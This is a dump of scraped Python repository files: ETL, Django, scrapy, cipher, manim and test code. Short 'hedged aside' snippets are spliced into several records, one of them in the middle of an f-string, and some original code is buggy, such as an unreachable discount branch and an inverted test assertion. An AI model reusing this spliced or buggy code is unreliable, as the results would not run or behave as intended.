t.split('_')])\n row[t] = soup.find(tag).text if soup.find(tag) else None \n return row \n\ndef div_dept_designations_row(sagitem,lis,soup):\n row = {\n 'sagitem':sagitem,\n 'lis':lis\n }\n for t in ('valid_div','valid_dept','limit_new','limit_new_date','limit_renew','limit_renew_date'):\n tag = ''.join([x.capitalize() for x in t.split('_')])\n row[t] = soup.find(tag).text if soup.find(tag) else None \n return row \n\ndef main():\n payees = []\n covInsPercentInfo = []\n divDeptDesignations = []\n\n try:\n lastEntry = mjdb.sg_last_entry(FILE)\n except Exception as e:\n lf.error(f\"mjdb.sg_last_entry({FILE})\\n{e}\")\n else:\n lastEntryDate = (dt.date(1967,12,31) + dt.timedelta(days=lastEntry[0])) if lastEntry[0] else dt.date(1967,12,31)\n lastEntryTime = ((dt.datetime.min + dt.timedelta(seconds=lastEntry[1])).time()) if lastEntry[1] else dt.time(0,0,0)\n try:\n batchesStatement = f\"SELECT {FILE.replace('_','.').upper()} *CRITERIA.BATCH* WITH LAST.ENTRY.DATE GE 
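# --- Hedged aside: the front-pointer above avoids O(n) list.pop(0) but never
# frees consumed slots. collections.deque is the idiomatic O(1)-at-both-ends
# equivalent:
from collections import deque

q2 = deque()
q2.append(1); q2.append(2); q2.append(3)
assert q2.popleft() == 1                 # dequeue
assert q2[0] == 2 and len(q2) == 2       # front / size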
{dt.datetime.strftime(lastEntryDate, '%m-%d-%Y')}\"\n batchesResponse = sgws.post_ptr_access_statement(batchesStatement)\n except Exception as e:\n lf.error(f\"sgws.post_ptr_access_statement({batchesStatement})\\n{e}\")\n else:\n for batch in hlp.parse_batch_items(batchesResponse):\n try:\n batchStatement = f\"SELECT {FILE.replace('_','.').upper()} *GET.BATCH* {batch}\"\n batchResponse = sgws.post_ptr_access_statement(batchStatement)\n except Exception as e:\n lf.error(f\"sgws.post_ptr_access_statement({batchStatement})\\n{e}\")\n for item in batchResponse.find_all('Item'):\n try:\n sagitem = item.get('sagitem')\n payees.append(payees_row(sagitem,item))\n except Exception as e:\n lf.error(f\"payees_row({sagitem},<>)\\n{e}\")\n else:\n try:\n [covInsPercentInfo.append(cov_ins_percent_info_row(sagitem,int(x.get('lis')),x)) for x in item.find_all('CovInsPercentInfo')]\n except Exception as e:\n lf.error(f\"unable to parse CovInsPercentInfo for {sagitem}:\\n{e}\")\n try:\n [divDeptDesignations.append(div_dept_designations_row(sagitem,int(x.get('lis')),x)) for x in item.find_all('DivDeptDesignations')]\n except Exception as e:\n lf.error(f\"unable to parse DivDeptDesignations for {sagitem}:\\n{e}\")\n stages = {\n 'payees':payees if payees else None,\n 'payees_cov_ins_percent_info':covInsPercentInfo if covInsPercentInfo else None,\n 'payees_div_dept_designations':divDeptDesignations if divDeptDesignations else None\n }\n for s in stages:\n if stages[s]:\n try:\n rcs = pd.DataFrame(stages[s]).to_sql(f'stg_{s}',ENGINE,'sagitta','replace',index=False,chunksize=10000,method='multi')\n except Exception as e:\n lf.error(f\"unable to stage records for {s}\\n{e}\")\n else:\n lf.info(f\"{rcs} record(s) staged for {s}\")\n if rcs > 0:\n try:\n rcu = mjdb.upsert_stage('sagitta',s, 'upsert')\n except Exception as e:\n lf.error(f\"mjdb.upsert_stage('sagitta',{s})\\n{e}\")\n else:\n lf.info(f\"mjdb.upsert_stage('sagitta',{s}) affected {rcu} record(s)\")\n finally:\n mjdb.drop_table('sagitta', f'stg_{s}')\n else:\n lf.info(f\"no records to stage for {s}\") \n\nif __name__ == '__main__':\n main()","repo_name":"jbeckom/python-mjdw","sub_path":"etl_sagitta_payees.py","file_name":"etl_sagitta_payees.py","file_ext":"py","file_size_in_byte":5931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13405283442","text":"from rest_framework import serializers\nfrom .models import Consumer, Transaction, User, Gru\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'is_consumer']\n\nclass ConsumerSerializer(serializers.ModelSerializer):\n user = UserSerializer(read_only = True)\n class Meta:\n model = Consumer\n fields = ['credit', 'has_studentship', 'created_at', 'type', 'user', 'user_hash']\n\n def create(self, validated_data):\n user = User(\n username=validated_data['username'],\n first_name=validated_data['first_name'],\n last_name=validated_data['last_name'],\n is_consumer=validated_data['is_consumer']\n )\n user.set_password(validated_data['password'])\n user.save()\n consumer = Consumer(\n user=user,\n credit=validated_data['credit'],\n has_studentship=validated_data['has_studentship'],\n type=validated_data['type']\n )\n consumer.save()\n\n return consumer\n\nclass TransactionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Transaction\n fields = ['type', 'value', 'created_at', 'consumer_cpf', 'operator']\n\n def create(self, validated_data):\n transaction = 
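# --- Hedged micro-demo of the naming convention payees_row() relies on:
# snake_case field names map onto PascalCase XML tags via capitalize().
def to_tag(field):
    return ''.join(part.capitalize() for part in field.split('_'))

assert to_tag('audit_entry_dt') == 'AuditEntryDt'
assert to_tag('payee_name') == 'PayeeName'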
Transaction(\n type = validated_data['type'],\n value = validated_data['value'],\n consumer_cpf = validated_data['consumer_cpf'],\n operator = validated_data['operator'],\n )\n transaction.save()\n return transaction\n\nclass GruSerializer(serializers.ModelSerializer):\n class Meta:\n model = Gru\n fields = ['code', 'value', 'created_at', 'consumer_cpf', 'operator']\n\n def create(self, validated_data):\n gru = Gru(\n code=validated_data['code'],\n value=validated_data['value'],\n consumer_cpf=validated_data['consumer_cpf'],\n operator=validated_data['operator']\n )\n\n gru.save()\n\n return gru\n","repo_name":"igorcaavalcante/easyru","sub_path":"core/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31532994196","text":"#!/usr/bin/env python3\n\nimport os\nimport re\nimport sys\nfrom argparse import ArgumentParser\nfrom copy import deepcopy\nfrom pathlib import Path\nfrom shutil import copyfile, copytree, rmtree\nfrom subprocess import check_call\n\nimport toml\n\nif __name__ == \"__main__\":\n # parse arguments ######################################################################\n parser = ArgumentParser()\n parser.add_argument(\"new_name\", help=\"The aliased name for this package when installing it.\")\n parser.add_argument(\n \"--install\", help=\"Install the package if this flag is present.\", action=\"store_true\"\n )\n parser.add_argument(\n \"--test\", help=\"Test the (new named) package if this flag is present.\", action=\"store_true\"\n )\n args = parser.parse_args()\n new_name = args.new_name\n\n # validate the new name ###############################################################\n assert re.match(\"[-a-zA-Z0-9_]+\", new_name) is not None, \"Invalid package name\"\n\n # create the new package description ##################################################\n root_path = Path(__file__).parent.absolute()\n current_config = toml.loads((root_path / \"pyproject.toml\").read_text())\n new_package_path = Path(__file__).parent.absolute() / new_name\n print(f\"new_package_path: {new_package_path}\")\n\n old_name = current_config[\"project\"][\"name\"]\n\n # remove the old generated package ####################################################\n if new_package_path.exists():\n rmtree(new_package_path)\n\n # copy files ##########################################################################\n for path in [\"torch2jax\", \"pyproject.toml\", \"setup.py\", \"tests\", \"README.md\", \"images\"]:\n src = root_path / path\n dest = new_package_path / path\n if src.is_file():\n copyfile(src, dest)\n else:\n copytree(src, dest)\n\n # rename the source directory #########################################################\n os.rename(new_package_path / \"torch2jax\", new_package_path / new_name)\n\n # write new config ####################################################################\n new_config = deepcopy(current_config)\n new_config[\"project\"][\"name\"] = new_name\n Path(new_package_path / \"pyproject.toml\").write_text(toml.dumps(new_config))\n\n # rewrite the setup.py file\n setup_py = Path(root_path / \"setup.py\").read_text()\n new_setup_py = re.sub(f'name=\"{old_name}\"', f'name=\"{new_name}\"', setup_py)\n Path(new_package_path / \"setup.py\").write_text(new_setup_py)\n\n # rewrite the README.md file\n README_md = Path(root_path / \"README.md\").read_text()\n README_md = re.sub(\n f\"from {old_name}\",\n f\"from {new_name}\",\n 
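# --- Hedged aside on the renaming step above: re.sub() treats its pattern as
# a regex, so interpolating a package name directly breaks on names containing
# metacharacters ('.', '+', ...). re.escape() keeps the match literal; the
# names below are illustrative.
import re

old_name, new_name = 'pkg+extras', 'pkg-alias'
text = 'name="pkg+extras"'
safe = re.sub(re.escape('name="%s"' % old_name), 'name="%s"' % new_name, text)
assert safe == 'name="pkg-alias"'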
Path(new_package_path / \"README.md\").read_text(),\n )\n README_md = (\n f\"### **NOTE: `{new_name}` is a pip alias for `{old_name}`**\\n\\n\"\n + f\"
\\n\\n---\\n\\n
    \\n\\n{README_md}\"\n )\n Path(new_package_path / \"README.md\").write_text(README_md)\n\n # rewrite the pyproject.toml file\n pyproject_toml = Path(root_path / \"pyproject.toml\").read_text()\n new_pyproject_toml = re.sub(\n f\"name\\s*=\\s*\\\"{current_config['project']['name']}\\\"\",\n f'name = \"{new_name}\"',\n pyproject_toml,\n )\n new_pyproject_toml = re.sub(\n f\"{current_config['project']['name']}\\s*=\", f\"{new_name} = \", new_pyproject_toml\n )\n Path(new_package_path / \"pyproject.toml\").write_text(new_pyproject_toml)\n\n # rename the test files ###############################################################\n test_files = sum(\n [\n [Path(root).absolute() / f for f in fnames if Path(f).suffix == \".py\"]\n for (root, _, fnames) in os.walk(new_package_path / \"tests\")\n ],\n [],\n )\n for test_file in test_files:\n test_file_text = Path(test_file).read_text()\n test_file_text = re.sub(\n f\"from {current_config['project']['name']}\",\n f\"from {new_name}\",\n test_file_text,\n )\n Path(test_file).write_text(test_file_text)\n\n if args.install:\n # install the package ##################################################################\n check_call([sys.executable, \"-m\", \"pip\", \"install\", \"-e\", str(new_package_path)])\n\n if args.test:\n assert args.install, \"You must install package before testing it, sorry.\"\n check_call([sys.executable, \"-m\", \"pytest\", str(new_package_path / \"tests\")])\n","repo_name":"rdyro/torch2jax","sub_path":"make_aliased_package.py","file_name":"make_aliased_package.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"71502003753","text":"from random import randint\nprint('Qual valor entre 0 e 10 o programa pensou? ')\nr = randint(0,10)\nq = 0\nacerto = False\nwhile not acerto:\n v = int(input('Qual é o seu palpite? '))\n q += 1\n if v > r :\n print('Menos... Tente novamente')\n if v < r:\n print('Mais... 
Tente novamente')\n if v == r:\n acerto = True\nprint(f'\\033[34mParabéns\\033[m, você acertou depois de \\033[34m{q}\\033[m tentativas')\n","repo_name":"qnomon/Python-Studies","sub_path":"ex058.py","file_name":"ex058.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32730461328","text":"from __future__ import division, print_function\n\nfrom itertools import cycle\nimport os\nimport sys\n\nfrom accelerator.colourwrapper import colour\nfrom accelerator.compat import PY2\nfrom accelerator import mp\n\n\ndef split_colour(spec):\n\tseq = colour('/', spec)\n\tif seq == '/':\n\t\treturn '', ''\n\tseq = seq.split('/', 1)[0] # we only want the setting, not the unsetting\n\tassert seq.startswith('\\x1b[')\n\tassert seq.endswith('m')\n\tseq = seq[2:-1]\n\tassert '\\x1b' not in seq\n\tfg = []\n\tbg = []\n\tfor part in seq.split(';'):\n\t\tcode = int(part.split(':', 1)[0])\n\t\tif 30 <= code <= 38 or 90 <= code <= 97:\n\t\t\ttarget = fg\n\t\telif 40 <= code <= 48 or 100 <= code <= 107:\n\t\t\ttarget = bg\n\t\telif code not in (39, 49):\n\t\t\tprint(\"Sorry, %s can only use colours, not attributes\" % (spec,), file=sys.stderr)\n\t\t\tsys.exit(1)\n\t\ttarget.append(part)\n\treturn ';'.join(fg), ';'.join(bg)\n\n\n# a rather incomplete SGR parser that replaces colour resets by our\n# selected colour (if we have one).\ndef collect_escseq(it, line_fg, line_bg):\n\tchars = ['\\x1b']\n\ttry:\n\t\tc = next(it)\n\t\tchars.append(c)\n\t\tif c == '[':\n\t\t\twhile True:\n\t\t\t\tc = next(it)\n\t\t\t\tif c == 'm':\n\t\t\t\t\tpieces = []\n\t\t\t\t\tfor piece in ''.join(chars)[2:].split(';'):\n\t\t\t\t\t\tcode = int(piece.split(':', 1)[0] or '0', 10)\n\t\t\t\t\t\tif code == 0:\n\t\t\t\t\t\t\tpieces = ['']\n\t\t\t\t\t\t\tif line_fg:\n\t\t\t\t\t\t\t\tpieces.append(line_fg)\n\t\t\t\t\t\t\tif line_bg:\n\t\t\t\t\t\t\t\tpieces.append(line_bg)\n\t\t\t\t\t\telif code == 39 and line_fg:\n\t\t\t\t\t\t\tpieces.append(line_fg)\n\t\t\t\t\t\telif code == 49 and line_bg:\n\t\t\t\t\t\t\tpieces.append(line_bg)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tpieces.append(piece)\n\t\t\t\t\treturn ('\\x1b[', ';'.join(pieces), 'm',)\n\t\t\t\tchars.append(c)\n\t\t\t\tif c not in '0123456789;:':\n\t\t\t\t\tbreak\n\texcept (StopIteration, ValueError):\n\t\tpass\n\treturn chars\n\n\ndef enable_lines(colour_prefix, process_setup=lambda: None, decode_lines=False):\n\tpre_fg0, pre_bg0 = split_colour(colour_prefix + '/oddlines')\n\tpre_fg1, pre_bg1 = split_colour(colour_prefix + '/evenlines')\n\tif pre_fg0 == pre_bg0 == pre_fg1 == pre_bg1 == '':\n\t\treturn\n\n\tdef lineme():\n\t\tos.close(liner_w)\n\t\tprocess_setup()\n\n\t\tcolours = cycle([\n\t\t\t(pre_fg0, pre_bg0),\n\t\t\t(pre_fg1, pre_bg1),\n\t\t])\n\n\t\tif PY2:\n\t\t\tin_fh = sys.stdin\n\t\t\terrors = 'replace'\n\t\telse:\n\t\t\tin_fh = sys.stdin.buffer.raw\n\t\t\terrors = 'surrogateescape'\n\t\tfor line in in_fh:\n\t\t\tline_fg, line_bg = next(colours)\n\t\t\tline = line.rstrip(b'\\n').decode('utf-8', errors)\n\t\t\tif decode_lines:\n\t\t\t\tline = '\\\\'.join(part.replace('\\\\n', '\\x1b[K\\n' if line_bg else '\\n') for part in line.split('\\\\\\\\'))\n\t\t\ttodo = iter(line)\n\t\t\tdata = []\n\t\t\tif line_fg and line_bg:\n\t\t\t\tdata.append('\\x1b[%s;%sm' % (line_fg, line_bg,))\n\t\t\telif line_bg:\n\t\t\t\tdata.append('\\x1b[%sm' % (line_bg,))\n\t\t\telif line_fg:\n\t\t\t\tdata.append('\\x1b[%sm' % (line_fg,))\n\t\t\tfor c in todo:\n\t\t\t\tif c == 
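# --- Hedged aside: collect_escseq() above hand-walks SGR sequences because it
# rewrites colour resets in place. For plain stripping, a regex over the
# narrow CSI ... 'm' subset it handles is enough:
import re

SGR = re.compile(r'\x1b\[[0-9;:]*m')
assert SGR.sub('', '\x1b[31mred\x1b[0m plain') == 'red plain'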
'\\x1b':\n\t\t\t\t\tdata.extend(collect_escseq(todo, line_fg, line_bg))\n\t\t\t\telse:\n\t\t\t\t\tdata.append(c)\n\t\t\tif line_bg:\n\t\t\t\tdata.append('\\x1b[K') # try to fill the line with bg (if terminal does BCE)\n\t\t\tdata.append('\\x1b[m\\n')\n\t\t\tdata = ''.join(data).encode('utf-8', errors)\n\t\t\twhile data:\n\t\t\t\tdata = data[os.write(1, data):]\n\tliner_r, liner_w = os.pipe()\n\tliner_process = mp.SimplifiedProcess(\n\t\ttarget=lineme,\n\t\tstdin=liner_r,\n\t\tname=colour_prefix + '-liner',\n\t)\n\tos.close(liner_r)\n\tos.dup2(liner_w, 1) # this is stdout for the parent process now\n\tos.close(liner_w)\n\treturn liner_process\n","repo_name":"pabloyoyoista/accelerator","sub_path":"accelerator/shell/lined.py","file_name":"lined.py","file_ext":"py","file_size_in_byte":3314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"72"} +{"seq_id":"37581639518","text":"import pytest\nfrom rest_framework import status\n\nfrom tests.factories import AnnouncementFactory\n\n\n@pytest.mark.django_db\ndef test_favorite_create(client, user_with_jwt_access_token):\n user, jwt_access_token = user_with_jwt_access_token\n ads_list = AnnouncementFactory.create_batch(10)\n\n data = {\n \"name\": \"test\",\n \"ads\": [ads.pk for ads in ads_list]\n }\n\n expected_data = {\n \"id\": 1,\n \"author\": user.username,\n \"name\": \"test\",\n \"ads\": [ads.pk for ads in ads_list]\n }\n\n response = client.post(\n \"/selection/\",\n data=data,\n content_type=\"application/json\",\n HTTP_AUTHORIZATION=f\"Bearer {jwt_access_token}\"\n )\n\n assert response.status_code == status.HTTP_201_CREATED\n assert response.data != expected_data\n","repo_name":"SergeyL-1979/Skypro_PD_13.0_Sergey_Levchuk_HW_31","sub_path":"tests/favorites/favorite_create_test.py","file_name":"favorite_create_test.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2845777120","text":"#entradas\nnombre=str(input(\"Ingrese su nombre:\"))\nmonto=float(input(\"Ingrese el monto de su compra:\"))\n\n#caja negra\nif monto<500000:\n p=monto\n descuento=0\nelif monto>=500000 and monto<=100000:\n p=monto*0.05\n descuento=5\nelif monto>100000 and monto<=700000:\n p=monto*0.11\n descuento=11\nelif monto>700000 and monto<=1500000:\n p=monto*0.18\n descuento=18\nelif monto>1500000:\n p=monto*0.25\n descuento=25\n\n#salida\nprint(nombre,\",Su monto de la compra es de \",monto,\" El monto a pagar es de \",p,\" por el descuento del \",descuento,\"%\")\n","repo_name":"Julianespino17/Tallleres_Algoritmos_y_Programacion","sub_path":"Taller Estructuras de Control Selectivas/9_Ejercicio.py","file_name":"9_Ejercicio.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42512264350","text":"##!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#-------------------------------------------------------------------------\n# Archivo: main.py\n# Capitulo: Estilo Publica-Suscribe\n# Version: 3.0.0 Marzo 2022\n# Descripción:\n#\n# Este archivo define el punto de ejecución del Publicador\n#\n#-------------------------------------------------------------------------\nimport random, time\nfrom src.patient import Patient\nfrom src.helpers.publicador import publish\n\nif __name__ == '__main__':\n print(\"Iniciando simulación del sistema SMAM...\")\n older_patients = []\n total_patients = random.randint(1, 5)\n print(f\"actualmente hay 
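# --- Hedged rework (assumption-heavy) of the discount tiers above: the
# original bounds are inconsistent (monto >= 500000 and monto <= 100000 can
# never both hold) and `p` stores the discount, not the amount payable.
# Ordered toy tiers via bisect; the bound values are made up:
from bisect import bisect_right

TIER_UPPER = [50_000, 100_000, 700_000, 1_500_000]
TIER_RATE = [0.0, 0.05, 0.11, 0.18, 0.25]

def payable(monto):
    rate = TIER_RATE[bisect_right(TIER_UPPER, monto)]
    return monto * (1 - rate)

assert payable(40_000) == 40_000             # below the first bound
assert payable(800_000) == 800_000 * 0.82    # 18% tier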
{total_patients} adultos mayores...\")\n for _ in range(total_patients):\n older_patients.append(Patient())\n print(\"comenzando monitoreo...\")\n print()\n for _ in range(20):\n timer_time = random.choice([4, 8])\n medicine = random.choice(['Paracetamol', 'Dipirona magnésica', 'Dipirona hioscina', 'Tramadol', 'Antidepresivo', 'Aspirina', 'Antiarritmico', 'Diuretico'])\n\n for patient in older_patients:\n print(\"Extrayendo datos del adulto mayor...\")\n patient.check_devices()\n print(\"Analizando datos del adulto mayor...\")\n\n if (timer_time % patient.timer.time == 0) and patient.timer.medicine==medicine:\n patient.timer.medicine_time = 1\n\n print(\"Notificando eventos detectados...\")\n publish('monitor', patient.to_json())\n publish('notifier', patient.to_json())\n\n if patient.wearable.blood_pressure > 110 or patient.wearable.temperature > 37.5 or patient.wearable.heart_rate > 110:\n print(\"Actualizando expediente...\")\n publish('record', patient.to_json())\n print()\n\n time.sleep(1)\n","repo_name":"SilverParsnip96/smam-publish-subscriber","sub_path":"smam-app/publicadores/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13917615279","text":"import random\nimport os\nscript_dir = os.path.dirname(__file__) \n\nalphabet = \"abcdefghijklmnopqrstuvwxyz \"\nauxkey = \"abcdefghijklmnopqrstuvwxyz\"\n\nletter_to_index = dict(zip(alphabet, range(len(alphabet))))\nindex_to_letter = dict(zip(range(len(alphabet)), alphabet))\n\ndef generatekey(sizemsg):\n tamañokey = random.randrange(sizemsg)\n key = \"\"\n for i in range(tamañokey):\n while True:\n letra = random.choice(auxkey)\n if letra!=' ':\n key += letra\n i=i\n break\n return key\n\ndef encrypt(file,keyS):\n try:\n f=open(file,\"r\")\n message=f.read()\n f.close()\n key = str(keyS)\n returnMessage = \"Cypher made successfully plese check your directory\"\n \n if(keyS == \"777\"):\n key = generatekey(len(message))\n returnMessage +=\" the key generate is ' \"+ key +\" '\"\n encrypted = \"\"\n split_message = [\n message[i : i + len(key)] for i in range(0, len(message), len(key))\n ]\n\n for each_split in split_message:\n i = 0\n for letter in each_split:\n number = (letter_to_index[letter] + letter_to_index[key[i]]) % len(alphabet)\n encrypted += index_to_letter[number]\n i += 1\n\n f = open(\"encrypt.vig\",\"w\")\n f.write(encrypted)\n f.close\n return returnMessage\n except:\n return \"Error encrypt\"\n\n\ndef decrypt(file,keyS):\n try:\n f=open(file,\"r\")\n cipher=f.read()\n f.close()\n key=str(keyS)\n decrypted = \"\"\n split_encrypted = [\n cipher[i : i + len(key)] for i in range(0, len(cipher), len(key))\n ]\n\n for each_split in split_encrypted:\n i = 0\n for letter in each_split:\n number = (letter_to_index[letter] - letter_to_index[key[i]]) % len(alphabet)\n decrypted += index_to_letter[number]\n i += 1\n\n f = open(\"decrypt.vig\",\"w\")\n f.write(decrypted)\n f.close\n return \"Decipher made successfully, plese check your directory\"\n except:\n return \"Error Decryption\"\n","repo_name":"EdmundoSanchezM/Cryptography","sub_path":"Practica1Affine_Vigenere/example/Vigenere.py","file_name":"Vigenere.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36770010026","text":"from imdb import IMDb\n\nactors = list()\nmovies = list()\n\n\nia = IMDb()\nthe_matrix = ia.get_movie('0133093')\n\nfor 
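# --- Hedged fix sketch for the Vigenere module above: generatekey() can
# return an empty key (randrange(n) may be 0), and an empty key makes the
# len(key) chunking step zero, so range() raises. A variant guaranteeing at
# least one character, plus a roundtrip check over the same 27-symbol alphabet:
import random
import string

ALPHABET = string.ascii_lowercase + ' '

def generate_key(max_len):
    length = random.randint(1, max(1, max_len))
    return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))

def shift(text, key, sign):
    out = []
    for i, ch in enumerate(text):
        k = ALPHABET.index(key[i % len(key)])
        out.append(ALPHABET[(ALPHABET.index(ch) + sign * k) % len(ALPHABET)])
    return ''.join(out)

key = generate_key(8)
msg = 'attack at dawn'
assert shift(shift(msg, key, +1), key, -1) == msg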
person in the_matrix[\"cast\"]:\n actors.append(person)\n\n# Now find a person's movies\n#for actor in actors[0:2]:\n#print(actor['name'])\n#for movie in ia.get_person(actor.personID)['filmography'][0]['actor']:\n# movies.append(movie.movieID)\n\ndef get_movies_from_actor(actor):\n all_movies = list()\n\n person = ia.get_person(actor.personID)['filmography'][0]\n if 'actor' not in person:\n return\n\n for movie in person['actor']:\n all_movies.append(movie)\n\n return all_movies\n\nfor actor in actors:\n print(actor)\n new_movies = get_movies_from_actor(actor)\n if new_movies is not None:\n movies += new_movies\n\n\nprint(\"Number of movies:\", len(movies))\nprint(\"Number of actors:\", len(actors))","repo_name":"nobbyhawk/imdb_network","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36639348565","text":"from manimlib import *\n\nclass Formula(Scene):\n def construct(self):\n formula_tex1 = Tex(r\"\\begin{bmatrix} cos(2 \\pi / 3) & -sin(2 \\pi / 3) & 0 \\\\ sin(2 \\pi / 3) & cos(2 \\pi /3) & 0 \\\\ 0 & 0 & 1 \\end{bmatrix} \\begin{bmatrix} x \\\\ y \\\\ z \\end{bmatrix}\")\n formula_tex1.scale(1)\n\n formula_tex2 = Tex(r\"\\left[\\begin{array}{cc|c} cos(2 \\pi / 3) & -sin(2 \\pi / 3) & 0 \\\\ sin(2 \\pi / 3) & cos(2 \\pi /3) & 0 \\\\ \\hline 0 & 0 & 1 \\end{array}\\right] \\quad \\left[\\begin{array}{c} x \\\\ y \\\\ \\hline z \\end{array} \\right]\")\n \n formula_tex3 = Tex(r\"\\begin{bmatrix} cos(2 \\pi / 3) & -sin(2 \\pi / 3) \\\\ sin(2 \\pi / 3) & cos(2 \\pi /3) \\\\ \\end{bmatrix} \\begin{bmatrix} x \\\\ y \\\\ \\end{bmatrix}\")\n formula_tex4 = Tex(r\"\\begin{bmatrix} 1 \\end{bmatrix} \\begin{bmatrix} z \\end{bmatrix}\")\n formula_tex3.scale(1)\n formula_tex2.scale(1)\n self.play(Write(formula_tex1))\n self.wait()\n self.clear()\n self.play(Write(formula_tex2))\n self.wait()\n self.play(formula_tex2.to_edge, UP)\n self.play(Write(formula_tex3))\n self.wait()\n self.play(formula_tex3.to_edge, LEFT)\n formula_tex4.to_edge(RIGHT)\n self.play(Write(formula_tex4))\n self.wait()\n\n\n\n\n","repo_name":"chemicalfiend/MyAnimations","sub_path":"tests/representation.py","file_name":"representation.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"17226501072","text":"#!/usr/bin/env python2\n \nimport scrapy\n\nclass RoomSpider(scrapy.Spider):\n \n #CONCURRENT_REQUESTS = 200 \n CONCURRENT_REQUESTS = 20 \n URL = 'https://sws.unimelb.edu.au/2017/'\n \n name = \"room\"\n start_urls = [URL]\n rooms = []\n custom_settings = {\n 'CONCURRENT_REQUESTS': 1\n }\n\n def parse(self, response):\n return scrapy.FormRequest.from_response(\n response,\n formdata = {'__EVENTTARGET': 'LinkBtn_locations', '__EVENTARGUMENT': ''},\n callback = self.process_rooms\n )\n\n def process_rooms(self, response):\n self.rooms = response.xpath('//select[@id=\"dlObject\"]/option/@value').extract()\n self.submission_response = response\n return self.post_data()\n\n def post_data(self):\n c = self.CONCURRENT_REQUESTS\n _d = []\n while c > 0 and len(self.rooms) > 0:\n c -= 1\n _d.append(self.rooms.pop())\n\n return scrapy.FormRequest.from_response(\n self.submission_response, \n clickdata = {'name': 'bGetTimetable'}, \n formdata = {'dlObject': _d,'lbWeeks': 't', 'RadioType': 'location_list;cyon_reports_list_url;dummy'}, \n dont_filter = True,\n callback = self.get_data\n )\n\n def 
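# --- Hedged aside (no network): the crawl above expands a cast into each
# actor's filmography; the aggregation it builds toward -- how often movies
# recur across co-stars -- is just a Counter over ids. Toy stand-in data:
from collections import Counter

filmographies = {
    'actor_a': ['m1', 'm2', 'm3'],
    'actor_b': ['m2', 'm3'],
    'actor_c': ['m3'],
}
movie_counts = Counter(m for films in filmographies.values() for m in films)
assert movie_counts.most_common(1) == [('m3', 3)]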
get_data(self, response):\n return scrapy.Request(\n url = self.URL + \"Reports/List.aspx\", \n dont_filter = True,\n callback = self._save\n )\n\n def _save(self, response):\n self.save_room(response)\n return self.post_data()\n\n def save_room(self, response):\n print(response.text);\n\n","repo_name":"teaso/UniMelb-RoomFinder","sub_path":"room_scrape.py","file_name":"room_scrape.py","file_ext":"py","file_size_in_byte":1634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31013415501","text":"from django import forms\nfrom .models import Application\nfrom django.utils.translation import gettext_lazy as _\n\nclass ApplicationForm(forms.ModelForm):\n name = forms.CharField(label=_(\"ФИО\"), max_length=50, widget=forms.TextInput(attrs={'class': 'form-control'}), required=False)\n email = forms.EmailField(label=\"Email\", widget=forms.TextInput(attrs={'class': 'form-control'}), required=False)\n phone_number = forms.CharField(label=_(\"Номер телефона\"), max_length=30, widget=forms.TextInput(attrs={'class': 'form-control'}), required=False)\n Comment = forms.CharField(label=_(\"Ваше сообщение\"), widget=forms.Textarea(attrs={'class': 'form-control', 'cols': 30, 'rows': 10}), required=False)\n\n\n class Meta:\n model = Application\n fields = ['name', 'email', 'phone_number', 'Comment']","repo_name":"VladlenKhan/tts","sub_path":"app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38141815879","text":"import frappe\nfrom frappe.tests.utils import FrappeTestCase\nfrom frappe.utils import add_to_date, flt, now_datetime, nowdate\n\nfrom erpnext.controllers.item_variant import create_variant\nfrom erpnext.manufacturing.doctype.production_plan.production_plan import (\n\tget_items_for_material_requests,\n\tget_sales_orders,\n\tget_warehouse_list,\n)\nfrom erpnext.manufacturing.doctype.work_order.work_order import OverProductionError\nfrom erpnext.selling.doctype.sales_order.test_sales_order import make_sales_order\nfrom erpnext.stock.doctype.item.test_item import create_item\nfrom erpnext.stock.doctype.stock_entry.test_stock_entry import make_stock_entry\nfrom erpnext.stock.doctype.stock_reconciliation.test_stock_reconciliation import (\n\tcreate_stock_reconciliation,\n)\n\n\nclass TestProductionPlan(FrappeTestCase):\n\tdef setUp(self):\n\t\tfor item in [\n\t\t\t\"Test Production Item 1\",\n\t\t\t\"Subassembly Item 1\",\n\t\t\t\"Raw Material Item 1\",\n\t\t\t\"Raw Material Item 2\",\n\t\t]:\n\t\t\tcreate_item(item, valuation_rate=100)\n\n\t\t\tsr = frappe.db.get_value(\n\t\t\t\t\"Stock Reconciliation Item\", {\"item_code\": item, \"docstatus\": 1}, \"parent\"\n\t\t\t)\n\t\t\tif sr:\n\t\t\t\tsr_doc = frappe.get_doc(\"Stock Reconciliation\", 